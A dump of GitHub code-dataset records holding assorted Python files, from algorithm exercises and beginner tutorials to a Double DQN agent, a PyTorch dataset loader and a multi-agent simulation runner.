land:\n lst += i\n print(i)\n lst = sorted(lst)\n print(lst)\n n = len(lst)\n #모두제거\n answer = sum(lst)*Q\n #맨밑으로제거\n cost = (sum(lst) - lst[0]*n )*Q\n answer = min(answer, cost)\n\n for i in range(1, n):\n if lst[i] != lst[i-1]:\n #추가 + 복원\n cost += (P * i * (lst[i]-lst[i-1])) - (Q * (n-i) * (lst[i]-lst[i-1]))\n answer = min(answer, cost)\n\n return answer\nsolution([[1, 2], [2, 3]],3,2)\n","repo_name":"Leesungsup/algo-test","sub_path":"지형편집.py","file_name":"지형편집.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19136498003","text":"from functools import wraps\nfrom pathlib import Path\nfrom typing import Callable, List\nimport docker\n\nfrom .config import config\n\n\ndef ensure_build_dir(f: Callable) -> Callable:\n \"\"\"Ensures that the build directory exists before running the decorated function\n\n Args:\n f (Callable): The function to decorate\n\n Returns:\n Callable: The decorated function\n \"\"\"\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n Path(config.BUILD_DIR).mkdir(exist_ok=True, parents=True)\n return f(*args, **kwargs)\n\n return wrapper\n\n\nclass Singleton(type):\n \"\"\"A singleton metaclass\"\"\"\n\n _instance = None\n\n def __call__(cls, *args, **kwargs):\n \"\"\"Creates a new instance of the class if one does not already exist\n\n Returns:\n cls._instance: The instance of the class\n \"\"\"\n if cls._instance is None:\n cls._instance = super().__call__(*args, 
**kwargs)\n return cls._instance\n\n\ndef next_free_tcp_port(port: int) -> int:\n \"\"\"Finds the next free port after the specified port\n\n Args:\n port (int): The port to start searching from\n\n Raises:\n ValueError: If no free ports are found\n\n Returns:\n int: The next free port\n \"\"\"\n ports: List[int] = []\n try:\n containers = config.CLIENT.containers.list(all=True)\n ports = []\n for container in containers:\n port_values = container.ports.values()\n if not port_values:\n continue\n for x in list(container.ports.values())[0]:\n ports.append(int(x[\"HostPort\"]))\n except docker.errors.NotFound: # type: ignore\n # * This error is raised if container list changes between getting the list and\n # * getting the ports. If this happens, just try again\n return next_free_tcp_port(port)\n if not ports:\n return port\n unique_ports = set(ports)\n while port in unique_ports:\n port += 1\n if port > 65535:\n raise ValueError(\"No free ports\")\n return port\n","repo_name":"Cian-H/I-Form_Server_Node_Deployer","sub_path":"src/node_deployer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2015444415","text":"\"\"\"\n.. moduleauthor:: Eric Torres\n\nUnit tests for the rbackup.struct.snapshot module.\n\"\"\"\n\nimport unittest\nfrom pathlib import Path\nfrom unittest.mock import DEFAULT, patch\n\nfrom rbackup.struct.snapshot import Snapshot\n\n# ========== Constants ==========\nTESTING_PACKAGE = \"rbackup.struct\"\nTESTING_MODULE = f\"{TESTING_PACKAGE}.snapshot\"\n\n\n# ========== Tests ==========\nclass TestSnapshotProperties(unittest.TestCase):\n def setUp(self):\n self.patched_path = patch.multiple(\n Path, exists=DEFAULT, mkdir=DEFAULT, symlink_to=DEFAULT, touch=DEFAULT\n )\n self.patched_metadata = patch.multiple(\n Snapshot, read_metadata=DEFAULT, write_metadata=DEFAULT\n )\n\n self.mocked_path = self.patched_path.start()\n self.mocked_metadata = self.patched_metadata.start()\n\n self.mocked_path[\"exists\"].return_value = False\n\n def test_ctime_returns_str(self):\n self.assertIsInstance(Snapshot(\"/tmp/backup/snapshot\").ctime, str)\n\n def tearDown(self):\n patch.stopall()\n","repo_name":"etorres4/rbackup","sub_path":"tests/test_snapshot.py","file_name":"test_snapshot.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14596854006","text":"##We have coded the transpose of 3 by 3 matrix \n\nnew_matrix= [[],[],[]]\ndef t_mat(mat):\n for i in range(3):\n for j in range(3):\n new_matrix[j][i]= mat[i][j]\n print(j,i,'=',i,j)\n return new_matrix\n \nprint(t_mat([[1,2,3],[4,5,6],[7,8,9]]))\n","repo_name":"hassankaleem/Advanced-Python-Tutorials","sub_path":"Unit 3 Week 3/week 3 transpose.py","file_name":"week 3 transpose.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"13404481911","text":"# Modified version of\n# DQN implementation by Tejas Kulkarni found at\n# https://github.com/mrkulk/deepQN_tensorflow\n\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\n\n\n#使用DQN算法\nclass DoubleDQN:\n def __init__(self, params):\n self.params = params # 传入常数(from pacman_Agents)\n self.network_name = 'DDQnet' # network的名字\n self.sess = tf.Session() # sess赋类\n\n self.x = tf.placeholder('float', [None, params['width'], 
params['height'], 6], name=self.network_name + '_x')\n self.x_ = tf.placeholder('float', [None, params['width'], params['height'], 6], name=self.network_name + '_x_')\n self.q_t = tf.placeholder('float', [None], name=self.network_name + '_q_t')\n # quality target\n self.actions = tf.placeholder(\"float\", [None, 4], name=self.network_name + '_actions')\n # action的选择\n self.rewards = tf.placeholder(\"float\", [None], name=self.network_name + '_rewards')\n # action对应得到的rewards\n self.terminals = tf.placeholder(\"float\", [None], name=self.network_name + '_terminals')\n # 是否终结 1表示终结,0表示未终结\n\n # def _build_net(self,params):\n ##########################################################################\n # 第一种network:一层CNN,一层MLP,一层输出\n def build_layers(x,names):\n # Layer 1 (Convolutional)\n layer_name = 'conv2' ; size = 3 ; channels = 6 ; filters = 16 ; stride = 1\n self.w2 = tf.Variable(tf.random_normal([size,size,channels,filters], stddev=0.01),name=self.network_name + '_'+layer_name+'_weights',collections=names)\n self.b2 = tf.Variable(tf.constant(0.1, shape=[filters]),name=self.network_name + '_'+layer_name+'_biases',collections=names)\n self.c2 = tf.nn.conv2d(x, self.w2, strides=[1, stride, stride, 1], padding='SAME',name=self.network_name + '_'+layer_name+'_convs')\n self.o2 = tf.nn.relu(tf.add(self.c2,self.b2),name=self.network_name + '_'+layer_name+'_activations')\n o2_shape = self.o2.get_shape().as_list()\n\n # Layer 2 (Fully connected)\n layer_name = 'fc3' ; hiddens = 256 ; dim = o2_shape[1]*o2_shape[2]*o2_shape[3]\n self.o2_flat = tf.reshape(self.o2, [-1,dim],name=self.network_name + '_'+layer_name+'_input_flat')\n self.w3 = tf.Variable(tf.random_normal([dim,hiddens], stddev=0.01),name=self.network_name + '_'+layer_name+'_weights',collections=names)\n self.b3 = tf.Variable(tf.constant(0.1, shape=[hiddens]),name=self.network_name + '_'+layer_name+'_biases',collections=names)\n self.ip3 = tf.add(tf.matmul(self.o2_flat,self.w3),self.b3,name=self.network_name + '_'+layer_name+'_ips')\n self.o3 = tf.nn.relu(self.ip3,name=self.network_name + '_'+layer_name+'_activations')\n\n # Layer 3 output\n layer_name = 'fc4' ; hiddens = 4 ; dim = 256\n self.w4 = tf.Variable(tf.random_normal([dim,hiddens], stddev=0.01),name=self.network_name + '_'+layer_name+'_weights',collections=names)\n self.b4 = tf.Variable(tf.constant(0.1, shape=[hiddens]),name=self.network_name + '_'+layer_name+'_biases',collections=names)\n self.y = tf.add(tf.matmul(self.o3,self.w4),self.b4,name=self.network_name + '_'+layer_name+'_outputs')\n\n return self.y\n\n ################### build eval net ##############################################\n with tf.variable_scope('eval_net'):\n self.y_eval= build_layers(x=self.x,names=['eval_net_params', tf.GraphKeys.GLOBAL_VARIABLES])\n self.y = self.y_eval\n #Q,Cost,Optimizer\n self.discount = tf.constant(self.params['discount']) #1-terminal:判断是否为terminal step;discount:参数;\n # # 计算Q_target(使用贝尔曼公式计算得到的理论值)\n self.yj = tf.add(self.rewards, tf.multiply(1.0-self.terminals, tf.multiply(self.discount, self.q_t)))\n self.y_eval_action = tf.reduce_sum(tf.multiply(self.y_eval, self.actions),reduction_indices=1)\n with tf.variable_scope('loss'):\n # 计算loss(cost),用MSE\n self.cost = tf.reduce_sum(tf.pow(tf.subtract(self.yj, self.y_eval_action), 2))\n\n with tf.variable_scope('optim'):\n # 为global_step开新变量寄存\n if self.params['load_file'] is not None:\n self.global_step = tf.Variable(int(self.params['load_file'].split('_')[-1]), name='global_step',\n trainable=False)\n else:\n self.global_step = 
tf.Variable(0, name='global_step', trainable=False)\n\n #Adam方法进行优化\n self.optim = tf.train.AdamOptimizer(self.params['lr']).minimize(self.cost, global_step=self.global_step)\n ################### build target net #############################################\n with tf.variable_scope('target_net'):\n c_names = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n self.y_next= build_layers(self.x_,c_names)\n self.y_next_action = tf.reduce_sum(tf.multiply(self.y_next, self.actions),reduction_indices=1)\n\n self.saver = tf.train.Saver(max_to_keep=0)\n # tf.reset_default_graph()\n self.sess.run(tf.global_variables_initializer()) # 再次初始化\n # 储存神经网络变量\n t_params = tf.get_collection('target_net_params')\n e_params = tf.get_collection('eval_net_params')\n self.replace_target_op = [tf.assign(t, e) for t, e in zip(t_params, e_params)]\n if self.params['load_file'] is not None:\n print('Loading checkpoint...')\n self.saver.restore(self.sess,self.params['load_file'])\n # DDQN主体\n def train(self,bat_s,bat_a,bat_t,bat_n,bat_r,cnt):\n if cnt % 100 ==0:\n self.sess.run(self.replace_target_op)\n\n feed_dict={self.x: bat_n,self.x_: bat_n,self.q_t: np.zeros(bat_n.shape[0]), self.actions: bat_a, self.terminals:bat_t, self.rewards: bat_r}\n # 运行Network\n q_next,q_eval4next= self.sess.run([self.y_next,self.y_eval],feed_dict=feed_dict) #32*4 (batch_size,hiddens)\n batch_index = np.arange(self.params['batch_size'], dtype=np.int32)\n max_act4next = np.argmax(q_eval4next, axis=1) # the action that brings the highest value is evaluated by q_eval\n selected_q_next = q_next[batch_index, max_act4next] # Double DQN, select q_next depending on above actions\n\n #传入 bat_s:state(observation);q_t:target quality;bat_a:action;\n feed_dict={self.x: bat_s,self.x_: bat_s,self.q_t:selected_q_next , self.actions: bat_a, self.terminals:bat_t, self.rewards: bat_r}\n _,cnt,cost = self.sess.run([self.optim, self.global_step,self.cost],feed_dict=feed_dict)\n return cnt, cost\n\n def save_ckpt(self,filename):\n self.saver.save(self.sess, filename)\n","repo_name":"Mr-OREO/CourseworkOfSE","sub_path":"人工智能导论(课程综合实践Ⅰ)/Project/PacmanDQN-master_group9/Double_DQN.py","file_name":"Double_DQN.py","file_ext":"py","file_size_in_byte":7034,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"35739331417","text":"import os\nimport zipfile\nimport numpy as np\nimport PIL.Image as Image\nimport matplotlib.pyplot as plt\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom torch.hub import download_url_to_file\nfrom config import DATASET_URL\n\nDATASET_TRANSFORM = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(256),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nGENERAL_TRANSFORM = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nINV_NORMALIZE = transforms.Normalize(\n mean=[-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.255],\n std=[1 / 0.229, 1 / 0.224, 1 / 0.255]\n)\n\ndef load_img(path):\n img = Image.open(path).convert('RGB')\n return img\n\nclass CustomDataset(Dataset):\n def __init__(self, path):\n super().__init__()\n\n if not os.path.exists(path):\n os.makedirs(path)\n tmp = os.path.join(path, 'dataset.zip')\n print(f'Downloading dataset from {DATASET_URL} to {tmp}...')\n download_url_to_file(DATASET_URL, tmp)\n\n print(f'Unzipping {tmp}...')\n with zipfile.ZipFile(tmp) as zf:\n 
zf.extractall(path=path)\n os.remove(tmp)\n else:\n print(f'Dataset path exists, skipping download')\n\n self.data = []\n self.root = path\n self.classes = os.listdir(path)\n for i in range(len(self.classes)):\n files = os.listdir(os.path.join(path, self.classes[i]))\n self.data += list(zip(files, [i] * len(files)))\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n file, label = self.data[index]\n dir = os.path.join(self.root, self.classes[label])\n return DATASET_TRANSFORM(load_img(os.path.join(dir, file)))\n\nif __name__ == '__main__':\n cd = CustomDataset('dataset')\n img = cd[0]\n print(img.shape)\n plt.imshow(np.moveaxis(img.cpu().detach().numpy(), 0, -1))\n plt.show()","repo_name":"sidharthNair/style-transfer","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1812214920","text":"# # We use process parallelism, so multi-threading tends to hurt our performance\n# import os\n# os.environ[\"OMP_NUM_THREADS\"] = \"1\"\n# os.environ[\"MKL_NUM_THREADS\"] = \"1\"\n# os.environ[\"OPENBLAS_NUM_THREADS\"] = \"1\"\n\n# TEMP\nfrom run import run, parse_args\nfrom sim import run_sim\nfrom systems.doubleintegrator import DoubleIntegrator\nfrom other_policy import Empty_Net_wAPF, ZeroPolicy, GoToGoalPolicy\n\n# standard\nfrom torch import nn, tanh, relu\nimport torch\nimport numpy as np\nfrom collections import namedtuple\nimport os\n\nclass DoubleIntegratorParam():\n\tdef __init__(self):\n\t\tself.env_name = 'DoubleIntegrator'\n\t\tself.env_case = None\n\n\t\t# some path param\n\t\tself.preprocessed_data_dir = 'data/preprocessed_data/'\n\t\tself.default_instance = \"map_8by8_obst6_agents8_ex0001.yaml\"\n\t\tself.current_model = 'il_current.pt'\n\n\t\t# dont change these sim param (same as ORCA baseline)\n\t\tself.n_agents = 4\n\t\tself.r_comm = 3. 
\n\t\tself.r_obs_sense = 3.\n\t\tself.r_agent = 0.15 \n\t\tself.r_obstacle = 0.5\n\t\tself.v_max = 0.5\n\t\tself.a_max = 2.0 \n\t\tself.v_min = -1*self.v_max\n\t\tself.a_min = -1*self.a_max\n\n\t\t# sim \n\t\tself.sim_t0 = 0\n\t\tself.sim_tf = 5 \n\t\tself.sim_dt = 0.5\n\t\tself.sim_times = np.arange(self.sim_t0,self.sim_tf,self.sim_dt)\n\t\tself.sim_nt = len(self.sim_times)\n\t\tself.plots_fn = 'plots.pdf'\n\n\t\t# for batching/speed\n\t\tself.max_neighbors = 6\n\t\tself.max_obstacles = 6\n\t\tself.rollout_batch_on = True\n\t\t\t\t\n\t\t# safety parameters\n\t\tself.safety = \"cf_di_2\" \n\t\tif self.safety == \"cf_di_2\": # 'working di 2' parameters\n\t\t\tself.pi_max = 1.5 # 0.05 \n\t\t\tself.kp = 0.025 # 0.01 \n\t\t\tself.kv = 1.0 # 2.0 \n\t\t\tself.cbf_kp = 0.035 # 0.5\n\t\t\tself.cbf_kd = 0.5 # 2.0\t\t\t \n\t\tself.Delta_R = 2*(0.5*0.05 + 0.5**2/(2*2.0))\n\t\tself.epsilon = 0.01\n\n\t\t# imitation learning param (IL)\n\t\tself.il_load_loader_on = False\n\t\tself.training_time_downsample = 50 #10\n\t\tself.il_train_model_fn = '../models/doubleintegrator/il_current.pt'\n\t\tself.il_imitate_model_fn = '../models/doubleintegrator/rl_current.pt'\n\t\tself.il_load_dataset_on = True\n\t\tself.il_test_train_ratio = 0.85\n\t\tself.il_batch_size = 4096*8\n\t\tself.il_n_epoch = 5\n\t\tself.il_lr = 1e-3\n\t\tself.il_wd = 0 #0.0002\n\t\tself.il_n_data = None # 100000 # 100000000\n\t\tself.il_log_interval = 1\n\t\tself.il_load_dataset = ['orca','centralplanner'] # 'random','ring','centralplanner'\n\t\tself.il_controller_class = 'Barrier' # 'Empty','Barrier',\n\t\tself.il_pretrain_weights_fn = None # None or path to *.tar file\n\t\t\n\t\t# dataset param\n\t\t# ex: only take 8 agent cases, stop after 10K points \n\t\tself.datadict = dict()\n\t\tself.datadict[\"8\"] = 10000 \n\n\t\t# plots\n\t\tself.vector_plot_dx = 0.25 \n\n\t\t# learning hyperparameters\n\t\tn,m,h,l,p = 4,2,64,16,16 # state dim, action dim, hidden layer, output phi, output rho\n\t\tself.il_phi_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(4,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,l)])\n\n\t\tself.il_phi_obs_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(4,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,l)])\n\n\t\tself.il_rho_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(l,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,p)])\n\n\t\tself.il_rho_obs_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(l,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,p)])\n\n\t\tself.il_psi_network_architecture = nn.ModuleList([\n\t\t\tnn.Linear(2*p+4,h),\n\t\t\tnn.Linear(h,h),\n\t\t\tnn.Linear(h,m)])\n\n\t\tself.il_network_activation = relu\n\n\t\t# plots\n\t\tself.vector_plot_dx = 0.3\n\n\ndef load_instance(param, env, instance):\n\n\timport yaml\n\tif instance:\n\t\twith open(instance) as map_file:\n\t\t\tmap_data = yaml.load(map_file,Loader=yaml.SafeLoader)\n\telse:\n\t\t# default\n\t\twith open(\"../results/doubleintegrator/instances/{}\".format(param.default_instance)) as map_file:\n\t\t# test map test dataset\n\t\t\tmap_data = yaml.load(map_file)\n\n\ts = []\n\tg = []\n\tfor agent in map_data[\"agents\"]:\n\t\ts.extend([agent[\"start\"][0] + 0.5, agent[\"start\"][1] + 0.5])\n\t\ts.extend([0,0])\n\t\tg.extend([agent[\"goal\"][0] + 0.5, agent[\"goal\"][1] + 0.5])\n\t\tg.extend([0,0])\n\n\tInitialState = namedtuple('InitialState', ['start', 'goal'])\n\ts0 = InitialState._make((np.array(s), np.array(g)))\n\n\tparam.n_agents = len(map_data[\"agents\"])\n\tenv.reset_param(param)\n\n\tenv.obstacles = 
map_data[\"map\"][\"obstacles\"]\n\tfor x in range(-1,map_data[\"map\"][\"dimensions\"][0]+1):\n\t\tenv.obstacles.append([x,-1])\n\t\tenv.obstacles.append([x,map_data[\"map\"][\"dimensions\"][1]])\n\tfor y in range(map_data[\"map\"][\"dimensions\"][0]):\n\t\tenv.obstacles.append([-1,y])\n\t\tenv.obstacles.append([map_data[\"map\"][\"dimensions\"][0],y])\n\n\treturn s0\n\n\ndef run_batch(param, env, instance, controllers):\n\ttorch.set_num_threads(1)\n\ts0 = load_instance(param, env, instance)\n\tfor name, controller in controllers.items():\n\t\tprint(\"Running simulation with \" + name)\n\n\t\tstates, observations, actions, step = run_sim(param, env, controller, s0, name=instance)\n\t\tresult = np.hstack((param.sim_times[0:step].reshape(-1,1), states[0:step]))\n\t\tbasename = os.path.splitext(os.path.basename(instance))[0]\n\t\tfolder_name = \"../results/doubleintegrator/{}\".format(name)\n\t\tif not os.path.exists(folder_name):\n\t\t\tos.mkdir(folder_name)\n\n\t\toutput_file = \"{}/{}.npy\".format(folder_name, basename)\n\t\twith open(output_file, \"wb\") as f:\n\t\t\tnp.save(f, result.astype(np.float32), allow_pickle=False)\n\nif __name__ == '__main__':\n\n\targs = parse_args()\n\tparam = DoubleIntegratorParam()\n\tenv = DoubleIntegrator(param)\n\n\tif args.il:\n\t\trun(param, env, None, None, args)\n\t\texit()\n\n\tcontrollers = {\n\t\t'current':torch.load(param.il_train_model_fn),\n\t\t# 'current_wapf': Empty_Net_wAPF(param,env,torch.load(param.il_train_model_fn)),\n\t\t# 'apf': Empty_Net_wAPF(param,env,GoToGoalPolicy(param,env)),\n\t\t# 'e2e' : torch.load('../results/doubleintegrator/exp1Barrier_0/il_current.pt'),\n\t\t# '2stage' : Empty_Net_wAPF(param,env,torch.load('../results/doubleintegrator/exp1Empty_0/il_current.pt')),\n\t}\n\n\ts0 = load_instance(param, env, args.instance)\n\n\tif args.batch:\n\t\tif args.controller:\n\t\t\tcontrollers = dict()\n\t\t\tfor ctrl in args.controller:\n\t\t\t\tname,kind,path = ctrl.split(',')\n\t\t\t\tif kind == \"EmptyAPF\":\n\t\t\t\t\tcontrollers[name] = Empty_Net_wAPF(param,env,torch.load(path))\n\t\t\t\telif kind == \"torch\":\n\t\t\t\t\tcontrollers[name] = torch.load(path)\n\t\t\t\telif kind == \"apf\":\n\t\t\t\t\tcontrollers[name] = Empty_Net_wAPF(param,env,GoToGoalPolicy(param,env))\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR unknown ctrl kind\", kind)\n\t\t\t\t\texit()\n\n\t\tif args.Rsense:\n\t\t\tparam.r_comm = args.Rsense\n\t\t\tparam.r_obs_sense = args.Rsense\n\t\tif args.maxNeighbors:\n\t\t\tparam.max_neighbors = args.maxNeighbors\n\t\t\tparam.max_obstacles = args.maxNeighbors\n\t\tenv.reset_param(param)\n\n\t\trun_batch(param, env, args.instance, controllers)\n\n\telif args.export:\n\t\tmodel = torch.load('/home/ben/projects/caltech/neural-pid/results/doubleintegrator/exp1Barrier_0/il_current.pt')\n\t\tmodel.export_to_onnx(\"IL\")\n\n\telse:\n\t\trun(param, env, controllers, s0, args)\n\n","repo_name":"bpriviere/glas","sub_path":"code/examples/run_doubleintegrator.py","file_name":"run_doubleintegrator.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"81"} +{"seq_id":"38296200631","text":"from EulerTools import is_prime\nfrom itertools import permutations\nimport matplotlib.pyplot as plt\n\n\n\ndef chart():\n plt.style.use('ggplot')\n\n x = some_primes()\n y = diff()\n\n plt.plot(x, y)\n\n plt.xlabel('Primes')\n plt.ylabel('diff')\n plt.show()\n\n\ndef some_primes():\n return [x for x in range(10**3, 10**4) if is_prime(x)]\n\n\ndef is_perm(n):\n res = 
sorted(list(str(n)))\n return res\n\n\ndef diff(n):\n res = [0]\n for i in range(1, len(n)):\n res.append(n[i] - n[i-1])\n return res\n\n\ndef some_perms(n):\n string = str(n)\n return set([int(''.join(x)) for x in permutations(string, 4) if x[0] != '0'])\n \n\ndef prime_perms():\n res = []\n primes = some_primes()\n for prime in primes:\n perms = some_perms(prime)\n sub_res = []\n for perm in perms:\n if perm in primes:\n sub_res.append(perm)\n if len(sub_res) >= 3:\n sub_res.sort()\n if sub_res not in res:\n res.append(sub_res)\n return res\n\n\ndef search():\n for nums in prime_perms():\n nums.reverse()\n # print(nums)\n for i in range(0, len(nums)-2):\n for j in range(i + 1, len(nums)-1):\n for k in range(j + 1, len(nums)-0):\n if nums[i] - nums[j] == nums[j] - nums[k]:\n print(nums[k], nums[j], nums[i])\n\n\nsearch() # == 2969 6299 9629\n\n","repo_name":"jayH4487/project_euler","sub_path":"49_prime_perms.py","file_name":"49_prime_perms.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35940801750","text":"import pickle\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport sys\n\nfrom matplotlib.colors import ListedColormap,LinearSegmentedColormap\ncolors = [\"darkorange\", \"gold\", \"lawngreen\", \"lightseagreen\",\"darkgreen\"]\ncmap_LOP = ListedColormap(colors)\n\n# colors = [\"black\", \"purple\", \"darkorange\",\"lawngreen\", \"gold\"]\n# nodes = np.linspace(0, 1, len(colors))\n# cmap_LOP = LinearSegmentedColormap.from_list(\"mycmap\", list(zip(nodes, colors)))\n\n\ndef plot_params():\n plt.rc('text', usetex=True)\n plt.rc('font', size=13)\n plt.rc('xtick', labelsize=11)\n plt.rc('ytick', labelsize=11)\n plt.rc('axes', labelsize=14)\n plt.rc('legend', fontsize=8)\n plt.rc('lines', linewidth=1.0)\n plt.rcParams[\"axes.formatter.limits\"] = (-3, 4)\n plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})\nplot_params()\n\ndef plot_LOP(t_phase_smp, lop, vizinhos, n):\n fig, ax2 = plt.subplots(ncols=1, nrows=1, figsize=(8,3),sharex=True)\n fig.set_tight_layout(20)\n fig.suptitle('$g_{ex}='+f'{gex}$ S/cm²' + ' | '+'$I='+f'{amp}$ nA'+ '\\n' +f'PopRate $={popRates:.2f}$Hz'+ ' | '+f'$r$: {float(r)}', fontsize=14)\n n_neurons = np.arange(lop.shape[1])\n t = t_phase_smp\n tg, ig = np.meshgrid(n_neurons, t)\n hm2 = ax2.pcolor(ig, tg, lop, cmap=cmap_LOP, vmax=1.0, vmin=0.)#cmap_LOP)\n\n cbar2= plt.colorbar(hm2, ax=ax2, ticks=[0, 1])\n cbar2.ax.set_yticklabels(['0.9', '1,0']) \n cbar2.set_label('LOP$(t)$')\n ax2.set_title('$\\delta='+f'{vizinhos}'+'$')\n ax2.set_ylabel('$n$ neurônio')\n ax2.set_ylim(0,len(n_neurons))\n ax2.set_xlabel('Tempo (ms)')\n # ax2.set_xlim(5000, 6000)\n plt.savefig(file+f'_PlotLOP_{gex}_{amp}_{vizinhos}_({n}).png', dpi=600, bbox_inches='tight')\n\nv = str(sys.argv[1])\nbatch = sys.argv[2]\nbatch_number = 'batch'+str(batch.zfill(4))\nsubbatch = sys.argv[3]\nsubbatch_number = '0_'+str(subbatch)\n\nfile = f'../data/v{v}_{batch_number}/v{v}_{batch_number}_{subbatch_number}'\n# file = f'../data/v6_batch0001/v6_batch0001_0_1'\n\nprint('\\n~~ Plot LOP ')\nprint(f'Reading: \"{file}\"')\nwith open(file + '_data.pkl', 'rb') as f:\n data = pickle.load(f)\n\ngex = data['simConfig']['gex']\namp = data['simConfig']['IClamp0']['amp']\nn_neighbors = data['simConfig']['n_neighbors']\ncellNumber = data['simConfig']['cellNumber']\nr = n_neighbors / cellNumber\npopRates = data['simData']['popRates']['sPY']\n\nlops = data['LOP_delta']\nt_phase = 
data['t_phase']\n\nti1 = int(0.1*len(t_phase))\nti2 = int(0.5*len(t_phase))\ntf = int(len(t_phase))\n\n\nfor delta, lop in lops.items():\n print(f'--> Plot LOP: delta = {delta}')\n plot_LOP(t_phase[ti1:tf], lop[ti1:tf,:], vizinhos=delta, n=1)\n plot_LOP(t_phase[ti1:ti2], lop[ti1:ti2,:], vizinhos=delta, n=2)\n\nprint('\\n~~')\n\n\n\n","repo_name":"FernandoSBorges/chimeras","sub_path":"sim/plotLOP.py","file_name":"plotLOP.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3387279689","text":"cost = 1\ntotalCost = 0\n\n\nprint(\"Input prices. Enter 0 to indicate that you are done entering.\")\n\n\nwhile cost != 0:\n strCost = raw_input(\"Enter the cost of the item: \")\n\n cost = float(strCost)\n\n totalCost += cost\nelse:\n\n print (\"The total is $\" + str(totalCost))\n\n\nstrTax = raw_input(\"How much will you be taxed? Enter whole numbers, I will treat it as a percent: \")\n\n\nsales_tax = float(strTax) / 100\n\n\ntotal = totalCost * sales_tax\nprint(\"You will be taxed \" + strTax + \"%\")\n\nprint(\"That is $\" + str(round(total, 2)))\ngrandTotal = float(total) + totalCost\n\nprint(\"The total cost, with tax, is: $\" + str(round(grandTotal, 2)))\n\n","repo_name":"Gijoe614/Sales_tax","sub_path":"Sales-tax.py","file_name":"Sales-tax.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38010288510","text":"# def add_and_print (a, b, c) : #add_and_print is the name of function # (a, b, c)= parameter (there are 3 parameters)\r\n# result = a + b + c\r\n# print(result) #(result) is an argument \r\n\r\n# x = 13.2 \r\n# y = 21.4 \r\n# z = 90\r\n\r\n# add_and_print(x, y, z) #there has to be the same # of arguments and parameters # (x, y, z) = arguments (3 arguments) \r\n\r\ndef add_and_print (a, b, c) : \r\n result = a + b + c \r\n return result\r\n\r\nx = float(input('Enter first number : '))\r\ny = float(input('Enter second number : '))\r\nz = float(input('Enter third number : '))\r\n\r\nprint(add_and_print(x, y, z)) ","repo_name":"Hannah0824/Python-","sub_path":"Python/Week1/4_Function.py","file_name":"4_Function.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41181916955","text":"import unittest\nimport subprocess\nimport goenrich\n\nclass TestGoenrich(unittest.TestCase):\n\n def test_analysis_and_export(self):\n O = goenrich.obo.ontology('db/go-basic.obo')\n gene2go = goenrich.read.gene2go('db/gene2go.gz')\n values = {k: set(v) for k,v in gene2go.groupby('GO_ID')['GeneID']}\n background_attribute = 'gene2go'\n goenrich.enrich.propagate(O, values, background_attribute)\n query = gene2go['GeneID'].unique()[:20]\n try:\n import pygraphviz\n goenrich.enrich.analyze(O, query, background_attribute, gvfile='test.dot')\n subprocess.check_call(['dot', '-Tpng', 'test.dot', '-o', 'test.png'])\n subprocess.check_call(['rm', 'test.dot', 'test.png'])\n except ImportError:\n goenrich.enrich.analyze(O, query, background_attribute)\n print('pygraphviz could not be imported')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"WenchaoLin/goenrich","sub_path":"goenrich/tests/test_enrichment.py","file_name":"test_enrichment.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} 
